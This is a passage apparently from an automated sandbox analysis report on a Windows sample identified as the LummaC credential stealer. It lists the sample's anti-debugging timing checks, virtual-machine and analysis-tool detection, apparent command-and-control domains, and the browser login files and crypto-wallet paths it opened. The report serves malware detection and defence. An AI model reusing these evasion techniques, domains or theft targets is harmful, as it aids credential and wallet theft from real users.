0x00000068 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903FC second address: 5490402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490402 second address: 5490406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490496 second address: 54904CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8408BD9DAEh 0x00000008 pop esi 0x00000009 mov ebx, 4FA10DE6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 test al, al 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 call 00007F8408BD9DB9h 0x0000001b pop esi 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54904CF second address: 5490505 instructions: 0x00000000 rdtsc 0x00000002 mov dh, 1Eh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, 6959h 0x0000000a popad 0x0000000b je 00007F84084B1859h 0x00000011 jmp 00007F84084B1634h 0x00000016 lea ecx, dword ptr [ebp-14h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F84084B162Ah 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490505 second address: 5490514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490514 second address: 549052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84084B1634h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490579 second address: 54905ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8408BD9DB2h 0x00000009 and esi, 3774BD68h 0x0000000f jmp 00007F8408BD9DABh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F8408BD9DB8h 0x0000001b adc ecx, 757B0FC8h 0x00000021 jmp 00007F8408BD9DABh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a nop 0x0000002b jmp 00007F8408BD9DB6h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54905ED second address: 5490609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1638h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490609 second address: 5490630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8408BD9DB5h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490661 second address: 5490667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490667 second address: 54906A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F847A0A7BAEh 0x00000011 pushad 0x00000012 mov eax, 107099BBh 0x00000017 movzx eax, di 0x0000001a popad 0x0000001b js 00007F8408BD9E1Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54906A0 second address: 54906A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54906A4 second address: 54906A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54906A8 second address: 54906AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54906AE second address: 54906BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408BD9DAAh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54906BC second address: 54906CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54906CD second address: 54906E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54906E5 second address: 5490732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B162Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F847997F3CDh 0x0000000f pushad 0x00000010 jmp 00007F84084B1634h 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 mov ebx, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f call 00007F84084B1638h 0x00000024 pop esi 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490732 second address: 54907B5 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F8408BD9DB7h 0x0000000c add eax, 0E2AFF1Eh 0x00000012 jmp 00007F8408BD9DB9h 0x00000017 popfd 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp-2Ch] 0x0000001c pushad 0x0000001d movzx ecx, dx 0x00000020 pushad 0x00000021 mov ah, dl 0x00000023 pushfd 0x00000024 jmp 00007F8408BD9DB0h 0x00000029 add eax, 2E9C8C48h 0x0000002f jmp 00007F8408BD9DABh 0x00000034 popfd 0x00000035 popad 0x00000036 popad 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8408BD9DB0h 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54907B5 second address: 54907BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54907BB second address: 54907C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54907C1 second address: 549080D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1638h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 popad 0x00000011 xchg eax, esi 0x00000012 jmp 00007F84084B162Fh 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F84084B1635h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549080D second address: 5490829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ax, dx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490829 second address: 5490864 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov si, bx 0x0000000a mov edi, 235175C2h 0x0000000f popad 0x00000010 popad 0x00000011 nop 0x00000012 jmp 00007F84084B1639h 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F84084B162Dh 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490864 second address: 549086A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549086A second address: 549086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480DF9 second address: 5480E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8408BD9DB6h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F8408BD9DB1h 0x00000016 pushfd 0x00000017 jmp 00007F8408BD9DB0h 0x0000001c add eax, 7A15A818h 0x00000022 jmp 00007F8408BD9DABh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b push eax 0x0000002c mov edi, 6B51A306h 0x00000031 pop edx 0x00000032 pushfd 0x00000033 jmp 00007F8408BD9DACh 0x00000038 adc cl, 00000078h 0x0000003b jmp 00007F8408BD9DABh 0x00000040 popfd 0x00000041 popad 0x00000042 mov ebp, esp 0x00000044 pushad 0x00000045 mov ebx, eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480E85 second address: 5480E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490CF4 second address: 5490D91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8408BD9DABh 0x00000009 and al, 0000005Eh 0x0000000c jmp 00007F8408BD9DB9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F8408BD9DB0h 0x00000018 adc ah, 00000058h 0x0000001b jmp 00007F8408BD9DABh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 cmp dword ptr [769B459Ch], 05h 0x0000002b jmp 00007F8408BD9DB6h 0x00000030 je 00007F847A097A45h 0x00000036 jmp 00007F8408BD9DB0h 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 call 00007F8408BD9DB3h 0x00000046 pop esi 0x00000047 popad 0x00000048 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490E24 second address: 5490E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84084B1634h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490F68 second address: 5490F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08E5 second address: 54B08E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08E9 second address: 54B08ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08ED second address: 54B08F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08F3 second address: 54B08F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08F9 second address: 54B08FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B08FD second address: 54B0938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F8408BD9DB0h 0x00000011 push eax 0x00000012 jmp 00007F8408BD9DABh 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 mov dl, cl 0x0000001b popad 0x0000001c mov esi, dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0938 second address: 54B093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B093C second address: 54B0942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0942 second address: 54B0991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 mov dh, AEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F84084B162Eh 0x00000013 or ch, 00000078h 0x00000016 jmp 00007F84084B162Bh 0x0000001b popfd 0x0000001c jmp 00007F84084B1638h 0x00000021 popad 0x00000022 je 00007F847994F057h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0991 second address: 54B0998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0998 second address: 54B09A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84084B162Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B09A7 second address: 54B09DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [769B459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8408BD9DADh 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0A23 second address: 54B0A45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov ah, 36h 0x0000000f movsx ebx, ax 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F84084B162Ch 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0A45 second address: 54B0A5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, 44ADh 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0A97 second address: 54B0A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0A9D second address: 54B0AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6CED74 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 872CAE instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6200Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6208Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: file.exe, 00000000.00000002.2238112404.000000000169E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: file.exe, 00000000.00000002.2238112404.00000000016F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: file.exe, 00000000.00000003.2154447068.0000000005E10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: file.exe, 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: file.exe, 00000000.00000003.2154447068.0000000005E0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B0F10 LdrInitializeThunk,0_2_006B0F10

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: file.exeString found in binary or memory: scriptyprefej.store
            Source: file.exeString found in binary or memory: navygenerayk.store
            Source: file.exeString found in binary or memory: founpiuer.store
            Source: file.exeString found in binary or memory: necklacedmny.store
            Source: file.exeString found in binary or memory: thumbystriw.store
            Source: file.exeString found in binary or memory: fadehairucw.store
            Source: file.exeString found in binary or memory: crisiwarny.store
            Source: file.exeString found in binary or memory: presticitpo.store
            Source: file.exe, 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oydfProgram Manager
            Source: file.exe, file.exe, 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: fProgram Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 3084, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: file.exeString found in binary or memory: llets/Electrum-LTC
            Source: file.exe, 00000000.00000003.2154108274.0000000005DBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: xtensions/Jaxx Libertyq
            Source: file.exeString found in binary or memory: Wallets/Exodus
            Source: file.exe, 00000000.00000003.2185780103.0000000001762000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exeString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
